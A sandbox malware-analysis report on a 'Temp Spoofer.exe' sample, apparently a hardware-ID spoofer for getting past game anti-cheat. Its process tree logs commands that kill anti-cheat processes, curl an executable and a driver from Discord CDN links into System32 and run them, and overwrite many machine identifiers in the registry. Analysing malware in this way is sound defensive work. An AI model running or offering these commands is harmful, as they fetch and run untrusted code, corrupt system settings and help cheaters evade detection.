Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15/06/2024, 18:56

General

  • Target

    Temp Spoofer.exe

  • Size

    669KB

  • MD5

    3cfca1029fe1c044dd240e81471967b9

  • SHA1

    8668de133c120645eae9de73fdeb89cb82a34c53

  • SHA256

    d64fee6bb51c86b3b04217a090f59d16a8d60ae02385c8d6e0c9f361e7945081

  • SHA512

    8bd23c1f23b6e7e21a173460167815b4d1b141bf6e847dfd0032773ccc15efa879d2e14374d90f97f0360fb0a42ba908f013890deb6c640d3cb8317bbb11d3d2

  • SSDEEP

    12288:CmB33xru4YHsYukZNyixyaUyL4SDUssmnL:/J3lu5kkZNbxbUyrDUqnL

Malware Config

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 10 IoCs
  • Modifies registry key 1 TTPs 53 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3400
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe" MD5
        3⤵
          PID:3672
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:4524
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:2908
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c cls
            2⤵
              PID:2000
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              2⤵
                PID:68
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1996
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic diskdrive get serialnumber
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3892
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3292
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic baseboard get serialnumber
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3736
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2600
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic bios get serialnumber
                  3⤵
                    PID:2868
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c getmac
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1516
                  • C:\Windows\system32\getmac.exe
                    getmac
                    3⤵
                      PID:2948
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c cls
                    2⤵
                      PID:596
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c cls
                      2⤵
                        PID:4580
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c net stop winmgmt
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4312
                        • C:\Windows\system32\net.exe
                          net stop winmgmt
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3136
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 stop winmgmt
                            4⤵
                              PID:4672
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im epicgameslauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2140
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im epicgameslauncher.exe
                            3⤵
                            • Kills process with taskkill
                            PID:2352
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im EpicWebHelper.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4316
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im EpicWebHelper.exe
                            3⤵
                            • Kills process with taskkill
                            PID:4364
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2376
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
                            3⤵
                            • Kills process with taskkill
                            PID:3828
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4644
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im FortniteLauncher.exe
                            3⤵
                            • Kills process with taskkill
                            PID:4984
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3260
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im FortniteClient-Win64-Shipping.exe
                            3⤵
                            • Kills process with taskkill
                            PID:4228
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3924
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
                            3⤵
                            • Kills process with taskkill
                            PID:868
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                          2⤵
                            PID:508
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im EpicGamesLauncher.exe
                              3⤵
                              • Kills process with taskkill
                              PID:3092
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c taskkill /f /im EasyAntiCheat.exe
                            2⤵
                              PID:2644
                              • C:\Windows\system32\taskkill.exe
                                taskkill /f /im EasyAntiCheat.exe
                                3⤵
                                • Kills process with taskkill
                                PID:3704
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c taskkill /f /im BEService.exe
                              2⤵
                                PID:4420
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im BEService.exe
                                  3⤵
                                  • Kills process with taskkill
                                  PID:2464
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c taskkill /f /im BattleEye.exe
                                2⤵
                                  PID:832
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im BattleEye.exe
                                    3⤵
                                    • Kills process with taskkill
                                    PID:1984
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d %random% /f >nul
                                  2⤵
                                    PID:5064
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d 10980 /f
                                      3⤵
                                      • Modifies registry key
                                      PID:2744
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1225582853472124929/1251608845957206046/MAC.bat?ex=666f3312&is=666de192&hm=3a2af25a2023fdcb16c6430360a7e8e535373f953d575b7a0e664332c5be37a6 -o C:\Windows\System32\Windows64Services.bat --silent
                                    2⤵
                                      PID:2932
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Windows64Services.bat --silent
                                      2⤵
                                        PID:428
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows64Services.bat
                                        2⤵
                                          PID:2592
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1225582853472124929/1251609876656820275/kenomapper.exe?ex=666f3408&is=666de288&hm=af10812e0e39d0947bd0f3b55530f798d424599ba1e2ac2f9382eeb8b87b8d5a -o C:\Windows\System32\wsl42.exe --silent
                                          2⤵
                                            PID:3772
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1225582853472124929/1251609586914300066/50wooferdriver.sys?ex=666f33c3&is=666de243&hm=c4c1c8e3709759bca096865f8ace2260fb2792735afa01ad89a31ee26a9bf6c7 -o C:\Windows\System32\wsl21.sys --silent
                                            2⤵
                                              PID:776
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\wsl42.exe C:\Windows\System32\null.sys --silent
                                              2⤵
                                                PID:2680
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c del C:\Windows\System32\wsl42.exe
                                                2⤵
                                                  PID:4628
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\wsl21.sys
                                                  2⤵
                                                    PID:3168
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d %random% /f >nul
                                                    2⤵
                                                      PID:3176
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d 10980 /f
                                                        3⤵
                                                        • Modifies registry key
                                                        PID:356
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t reg_SZ /d %random% /f >nul
                                                      2⤵
                                                        PID:1092
                                                        • C:\Windows\system32\reg.exe
                                                          reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t reg_SZ /d 10983 /f
                                                          3⤵
                                                          • Modifies registry key
                                                          PID:664
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
                                                        2⤵
                                                          PID:4460
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t reg_SZ /d {1098321251-1005132058-662625648} /f
                                                            3⤵
                                                            • Modifies registry key
                                                            PID:196
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                          2⤵
                                                            PID:3632
                                                            • C:\Windows\system32\reg.exe
                                                              reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                              3⤵
                                                              • Modifies registry key
                                                              PID:4708
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
                                                            2⤵
                                                              PID:3076
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t reg_SZ /d {1098321251-1005132058-662625648} /f
                                                                3⤵
                                                                • Modifies registry key
                                                                PID:1864
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
                                                              2⤵
                                                                PID:1264
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t reg_SZ /d {1098321251-1005132058-662625648} /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:1316
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t reg_QWORD /d %random%%random%-%random%%random%-%random%%random% /f
                                                                2⤵
                                                                  PID:3212
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t reg_QWORD /d 1098321251-1005132058-662625648 /f
                                                                    3⤵
                                                                    • Modifies registry key
                                                                    PID:2184
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t reg_QWORD /d %random%%random%-%random%%random%-%random%%random% /f
                                                                  2⤵
                                                                    PID:4320
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t reg_QWORD /d 1098321251-1005132058-662625648 /f
                                                                      3⤵
                                                                      • Modifies registry key
                                                                      PID:2168
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t reg_QWORD /d %random%%random%-%random%%random%-%random%%random% /f
                                                                    2⤵
                                                                      PID:3356
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t reg_QWORD /d 1098321251-1005132058-662625648 /f
                                                                        3⤵
                                                                        • Modifies registry key
                                                                        PID:5060
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
                                                                      2⤵
                                                                        PID:3788
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                          3⤵
                                                                          • Modifies registry key
                                                                          PID:1052
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
                                                                        2⤵
                                                                          PID:1692
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                            3⤵
                                                                            • Modifies registry key
                                                                            PID:3080
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                          2⤵
                                                                            PID:780
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                              3⤵
                                                                              • Modifies registry key
                                                                              PID:4800
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                            2⤵
                                                                              PID:4928
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                3⤵
                                                                                • Modifies registry key
                                                                                PID:3108
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                              2⤵
                                                                                PID:4204
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                  3⤵
                                                                                  • Modifies registry key
                                                                                  PID:2916
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                2⤵
                                                                                  PID:3892
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                    3⤵
                                                                                    • Modifies registry key
                                                                                    PID:1996
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                  2⤵
                                                                                    PID:3792
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                      3⤵
                                                                                      • Modifies registry key
                                                                                      PID:4160
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                    2⤵
                                                                                      PID:3292
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                        3⤵
                                                                                        • Modifies registry key
                                                                                        PID:3348
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                      2⤵
                                                                                        PID:4400
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                          3⤵
                                                                                          • Enumerates system info in registry
                                                                                          • Modifies registry key
                                                                                          PID:3564
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                        2⤵
                                                                                          PID:2024
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                            3⤵
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies registry key
                                                                                            PID:2356
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
                                                                                          2⤵
                                                                                            PID:1516
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t reg_SZ /d {1098321251-1005132058-662625648} /f
                                                                                              3⤵
                                                                                              • Modifies registry key
                                                                                              PID:596
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
                                                                                            2⤵
                                                                                              PID:2256
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                3⤵
                                                                                                • Modifies registry key
                                                                                                PID:4492
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
                                                                                              2⤵
                                                                                                PID:2988
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                  3⤵
                                                                                                  • Modifies registry key
                                                                                                  PID:656
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t reg_SZ /d%random%%random%-%random%%random%-%random%%random% /f >nul
                                                                                                2⤵
                                                                                                  PID:2996
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t reg_SZ /d1098321251-1005132058-662625648 /f
                                                                                                    3⤵
                                                                                                    • Modifies registry key
                                                                                                    PID:4744
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                  2⤵
                                                                                                    PID:3000
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                      3⤵
                                                                                                      • Modifies registry key
                                                                                                      PID:2236
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
                                                                                                    2⤵
                                                                                                      PID:4172
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                        3⤵
                                                                                                        • Modifies registry key
                                                                                                        PID:436
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
                                                                                                      2⤵
                                                                                                        PID:4476
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                          3⤵
                                                                                                          • Modifies registry key
                                                                                                          PID:4504
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                        2⤵
                                                                                                          PID:2980
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                            3⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:3384
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                          2⤵
                                                                                                            PID:2172
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                              3⤵
                                                                                                              • Modifies registry key
                                                                                                              PID:2292
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                            2⤵
                                                                                                              PID:520
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                3⤵
                                                                                                                • Modifies registry key
                                                                                                                PID:2044
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                              2⤵
                                                                                                                PID:512
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                  3⤵
                                                                                                                  • Modifies registry key
                                                                                                                  PID:3380
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                2⤵
                                                                                                                  PID:3660
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                    3⤵
                                                                                                                    • Modifies registry key
                                                                                                                    PID:4484
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                  2⤵
                                                                                                                    PID:1012
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                      3⤵
                                                                                                                      • Modifies registry key
                                                                                                                      PID:2976
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                    2⤵
                                                                                                                      PID:2804
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                        3⤵
                                                                                                                        • Modifies registry key
                                                                                                                        PID:2188
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                      2⤵
                                                                                                                        PID:4608
                                                                                                                        • C:\Windows\system32\reg.exe
